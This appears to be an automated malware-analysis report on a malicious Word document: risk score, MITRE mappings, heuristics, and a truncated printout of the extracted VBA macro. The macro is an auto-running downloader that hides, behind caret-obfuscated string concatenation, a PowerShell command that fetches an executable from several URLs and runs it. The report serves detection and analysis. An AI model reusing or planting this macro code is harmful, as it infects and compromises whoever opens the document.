MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is a malicious Office document containing a VBA macro. The AutoOpen subroutine is present, indicating it will execute automatically when the document is opened. The script attempts to construct and execute a command using obfuscated string concatenation, which is a common technique for downloading and executing further malicious content. The ClamAV detection name 'Doc.Downloader' further supports this assessment.
Heuristics 5
-
ClamAV: Doc.Downloader.00536d-6691372-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.00536d-6691372-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5120 bytes |
SHA-256: 38b451e5b3cfbc577df705d30201f93b251b21070753826c9cacc2ef940266fe |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "KwOWiLclmzhiT"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Const EBzqHivSBm = 0
Dim ncqZmz(2)
ncqZmz(0) = Right(RSzmpV, 714)
ncqZmz(1) = Right(RSzmpV, 714)
Dim FDGYj(5)
FDGYj(0) = Right(RSzmpV, 714)
FDGYj(1) = MidB(OiausG, 647, 381)
FDGYj(2) = Left(rpXzOl, 37)
FDGYj(3) = Mid(paYDvG, 537, 387)
FDGYj(4) = MidB(OiausG, 647, 381)
Dim XtFFUn(3)
XtFFUn(0) = Left(rpXzOl, 37)
XtFFUn(1) = MidB(OiausG, 647, 381)
XtFFUn(2) = Right(RSzmpV, 714)
Shell@ rwiwnGT + vvqkUijSdkIdjI + wpbwhAfjhU, EBzqHivSBm
Dim zfVMv(3)
zfVMv(0) = Right(RSzmpV, 714)
zfVMv(1) = Mid(paYDvG, 537, 387)
zfVMv(2) = Mid(paYDvG, 537, 387)
Dim QKrlL(4)
QKrlL(0) = Left(rpXzOl, 37)
QKrlL(1) = Left(rpXzOl, 37)
QKrlL(2) = MidB(OiausG, 647, 381)
QKrlL(3) = Mid(paYDvG, 537, 387)
Dim pCHIpU(3)
pCHIpU(0) = Mid(paYDvG, 537, 387)
pCHIpU(1) = Mid(paYDvG, 537, 387)
pCHIpU(2) = MidB(OiausG, 647, 381)
Dim wzSwoi(4)
wzSwoi(0) = Left(rpXzOl, 37)
wzSwoi(1) = Right(RSzmpV, 714)
wzSwoi(2) = Right(RSzmpV, 714)
wzSwoi(3) = Mid(paYDvG, 537, 387)
End Sub
Attribute VB_Name = "DAswUfSL"
Function rwiwnGT()
Dim DBiBM(4)
DBiBM(0) = MidB(OiausG, 647, 381)
DBiBM(1) = MidB(OiausG, 647, 381)
DBiBM(2) = Mid(paYDvG, 537, 387)
DBiBM(3) = Left(rpXzOl, 37)
Dim pftba(2)
pftba(0) = MidB(OiausG, 647, 381)
pftba(1) = Left(rpXzOl, 37)
Dim wqHNkR(4)
wqHNkR(0) = Mid(paYDvG, 537, 387)
wqHNkR(1) = Right(RSzmpV, 714)
wqHNkR(2) = Mid(paYDvG, 537, 387)
wqHNkR(3) = Mid(paYDvG, 537, 387)
Dim sOXiz(2)
sOXiz(0) = Right(RSzmpV, 714)
sOXiz(1) = MidB(OiausG, 647, 381)
fdwBnRsMmb = Chr(Format(18 + 1 + 15 + 5 + 60)) + "md /V^" + ":^ON/" + Chr(Format(12 + 1 + 10 + 3 + 41)) + Chr(Format(5 + 0 + 4 + 1 + 24)) + "^s^et" + " V^t= ^ ^ ^ " + "^ ^ ^ ^ }}{h" + Chr(Format(18 + 1 + 15 + 5 + 60)) + "^t" + "^a" + Chr(Format(18 + 1 + 15 + 5 + 60)) + "^};^kaerb;VN^a^$ m^et^I^-" + "ek^ovn^I;)VN^a^$^ ^,^jlN^$(" + "^e^l^i^Fd^aoln" + "^w^o^D^.Aw^q^$^{^yrt^{)^" + "X^pn$ n^i^ ^j"
Dim iEGjv(2)
iEGjv(0) = Left(rpXzOl, 37)
iEGjv(1) = MidB(OiausG, 647, 381)
Dim hMStm(3)
hMStm(0) = MidB(OiausG, 647, 381)
hMStm(1) = Left(rpXzOl, 37)
hMStm(2) = Right(RSzmpV, 714)
Dim ldRrX(5)
ldRrX(0) = MidB(OiausG, 647, 381)
ldRrX(1) = MidB(OiausG, 647, 381)
ldRrX(2) = MidB(OiausG, 647, 381)
ldRrX(3) = Mid(paYDvG, 537, 387)
ldRrX(4) = Right(RSzmpV, 714)
Dim nhbBZ(2)
nhbBZ(0) = MidB(OiausG, 647, 381)
nhbBZ(1) = MidB(OiausG, 647, 381)
NBZPBiHqiVN = "^lN$(^h" + Chr(Format(18 + 1 + 15 + 5 + 60)) + "a^ero^f;^'exe" + ".^'+^ph^" + "j^$^+^'\'+" + Chr(Format(18 + 1 + 15 + 5 + 60)) + "^" + "il^b^up^" + ":vne^$=VNa$^;'3^34^'^ =^ phj" + "^$;)^'@'(t^ilp^S."
Dim QrzsQ(2)
QrzsQ(0) = Left(rpXzOl, 37)
QrzsQ(1) = Left(rpXzOl, 37)
Dim suWJUT(3)
suWJUT(0) = Left(rpXzOl, 37)
suWJUT(1) = Right(RSzmpV, 714)
suWJUT(2) = Mid(paYDvG, 537, 387)
OYLXh = "'mm/^s^u.ohsin//" + ":pt^th^@^aXBbX/^un^.^t" + "^ensp//^:p^t" + "t^h^@L^DNz" + "D^GB/^wvvw/^m^o" + Chr(Format(18 + 1 + 15 + 5 + 60)) + ".^e" + Chr(Format(18 + 1 + 15 + 5 + 60)) + "^a^lpr^a^eg//^:^ptth" + "@W" + Chr(Format(12 + 1 + 10 + 3 + 41)) + "F^dv/"
Dim fGWGUJ(2)
fGWGUJ(0) = Mid(paYDvG, 537, 387)
fGWGUJ(1) = Right(RSzmpV, 714)
Dim JMYBo(5)
JMYBo(0) = Left(rpXzOl, 37)
JMYBo(1) = Mid(paYDvG, 537, 387)
JMYBo(2) = MidB(OiausG, 647, 381)
JMYBo(3) = Right(RSzmpV, 714)
JMYBo(4) = Mid(paYDvG, 537, 387)
YXGhmOG = "^m^o" + Chr(Format(18 + 1 + 15 + 5 + 60)) + "^.rosn" + "^a^s^ak^e^pi//:^p^tth^@2^I^" + "f^dgn^G" + "^A/^m^" + "o" + Chr(Format(18 + 1 + 15 + 5 + 60)) + ".^ar^a^g^esn^i//^:^" + "p^tt^h'=X^pn^$;^tn^e^" + "il" + Chr(Format(12 + 1 + 10 + 3 + 41)) + "b^e^W.t^" + "eN ^t" + Chr(Format(18 + 1 + 15 + 5 + 60)) + "ej" + "^bo^-^w^en^=A^" + "wq$^ l^l^"
Dim cczkai(4)
cczkai(0) = Mid(paYDvG, 537, 387)
cczkai(1) = Right(RSzmpV, 714)
cczkai(2) = Mid(paYDvG, 537, 387)
cc
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.